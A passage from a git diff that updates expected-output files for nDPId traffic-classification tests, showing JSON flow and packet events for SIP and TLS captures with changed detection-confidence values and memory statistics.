-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} -00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1120469572844,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":31644,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1120469572844,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":34047,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} +00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1120469572844,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":31644,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1120469572844,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":34047,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","packets-captured":112,"packets-processed":112,"total-skipped-flows":0,"total-l4-payload-len":44455,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":7,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1120471094413} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 112/112 @@ -40,9 +40,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875871 bytes -~~ total memory freed........: 5875871 bytes -~~ total allocations/frees...: 118238/118238 +~~ total memory allocated....: 6009505 bytes +~~ total memory freed........: 6009505 bytes +~~ total allocations/frees...: 121000/121000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1532 chars diff --git a/test/results/sip_hello.pcapng.out b/test/results/sip_hello.pcapng.out new file mode 100644 index 000000000..ed0f098ca --- /dev/null +++ b/test/results/sip_hello.pcapng.out @@ -0,0 +1,26 @@ +00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sip_hello.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sip_hello.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645515834707} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645515834707,"flow_last_seen":1645515834707,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1645515834707,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645515834707,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":13,"thread_ts_msec":1645515834707,"pkt":"AAAAAAAAAAIAsZqMCABFAAAh925AAP0RDAoK75zrrB0mWxPEE8QADQAAaGVsbG8AAAAAAAAAAAA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645515834709,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":13,"thread_ts_msec":1645515834709,"pkt":"AAAAAAAAAAUAlkboCABFAAAhAABAAEARwHmsHSZbCu+c6xPEE8QADRonaGVsbG8AAAAAAAAAAAA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645515883863,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":13,"thread_ts_msec":1645515883863,"pkt":"AAAAAAAAAAIAsZqMCABFAAAhIqxAAP0R4MwK75zrrB0mWxPEE8QADQAAaGVsbG8AAAAAAAAAAAA="} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1645515834707,"flow_last_seen":1645515995292,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1645515995292,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":15,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1645515834707,"flow_last_seen":1645516031332,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":619,"flow_tot_l4_payload_len":2063,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1645516031332,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":23,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1645515834707,"flow_last_seen":1645516227955,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":619,"flow_tot_l4_payload_len":2103,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1645516227955,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1645515834707,"flow_last_seen":1645516326267,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":619,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1645516326267,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"sip_hello.pcapng","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":4134,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":2,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1645516326267} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 30/30 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 4134 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6003947 bytes +~~ total memory freed........: 6003947 bytes +~~ total allocations/frees...: 120906/120906 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 460 chars +~~ json string max len.......: 689 chars +~~ json string avg len.......: 571 chars diff --git a/test/results/sites.pcapng.out b/test/results/sites.pcapng.out index 4e019b9d3..046097863 100644 --- a/test/results/sites.pcapng.out +++ b/test/results/sites.pcapng.out @@ -4,97 +4,97 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595957694169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694169,"pkt":"CL6sCxdumt9Y+uvcCABFAAA86wlAAEAGQqHAqAypRav6FLRQAbvxSUO4AAAAAKAC\/\/943AAAAgQFtAQCCAp3CF\/6AAAAAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595957694175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694175,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAAFUGGKtFq\/oUwKgMqQG7tFDMBUIi8UlDuaASbHAk8gAAAgQFeAQCCAqwcikLdwhf+gEDAwg="} 00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595957694181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":447,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":447,"pkt_l4_len":413,"thread_ts_msec":1595957694181,"pkt":"CL6sCxdumt9Y+uvcCABFAAGx6wtAAEAGQSrAqAypRav6FLRQAbvxSUO5zAVCI4AYAKzC2gAAAQEICncIYAWwcikLFgMBAXgBAAF0AwMbz\/EVbbBeXTFd91pcxBNP5UcnCfq3Wnx+FKK431A8vCCYle6z8aZolVAW\/WsVOAFFqAocCpVZly96\/6VmRt6unAAGEwETAhMDAQABJQArAAUEAwT7GgAKAAYABAAdABcAMwAmACQAHQAgzM0Khe3cuLbHFAoUoUQ75VluiC+bl0wBHYa7GiFLSWoADQAGAAQEAwgEAAAAGwAZAAAWZWRnZS1tcXR0LmZhY2Vib29rLmNvbQAQAAsACQJoMgVoMi1mYgAtAAMCAQAAKgAAACkAoQB8AHb7PHlIDGTq5r6EmcaA47DeHw9k60TmJpJ4kMbWc07CmAAAAACvwY+4+cqVZO3LiyMH\/OBKqYTgxknPoune8SSx08gYUQ5v8dX54IHzjPiACk0t5hhgO+DjiFkUqTNKryO5SnHrNvAKz6QqOMdma4t912EvXAHgfFvQwwAhIFgFM36LO5BemV+W466ubu2dweNDP\/fyvoT9kq0FWNy9"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1623221441867} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221441867,"flow_last_seen":1623221441867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221441867,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623221441867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441867,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8opRAAEAGGajAqAH6XHpfY6OWAbs7TQBaAAAAAKAC\/\/9coQAAAgQFtAQCCAqqdeFuAAAAAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623221441879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441879,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA8AABAADgGxDxcel9jwKgB+gG7o5aALohKO00AW6AS\/ojeuQAAAgQFtAQCCAoeqlgsqnXhbgEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623221441880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623221441880,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA0opVAAEAGGa\/AqAH6XHpfY6OWAbs7TQBbgC6IS4AQAKwLVQAAAQEICqp14Xweqlgs"} -00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": 